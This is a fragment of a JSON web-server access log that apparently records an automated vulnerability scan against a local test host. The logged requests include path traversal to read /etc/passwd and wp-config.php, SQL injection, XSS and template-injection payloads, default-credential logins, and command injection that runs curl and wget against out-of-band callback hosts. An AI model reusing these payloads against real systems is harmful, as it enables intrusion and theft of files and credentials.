HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/maint/repair.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/x.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//ca285tosmpvbafqg07h0ckxgnqkfcowno.oast.funPa_Note%27","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/file_transfer.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"29KAY1d4UdL4xyn5LWujdctqONW.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.027","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KAXyKaIsqR8jr92zg3XJ3Xvzm?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /express-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22userName\x22:\x22admin\x22,\x22password\x22:\x22cs141-snmp\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logo/29KAY1d4UdL4xyn5LWujdctqONW.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm_tiles/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weblogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22userName\x22:\x22engineer\x22,\x22password\x22:\x22engineer\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fca285tosmpvbafqg07h079wcitzhh3bhy.oast.fun%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /(download)/tmp/poc.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KAXxnNErabAf4zBG0em7z5TY4.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph_cms 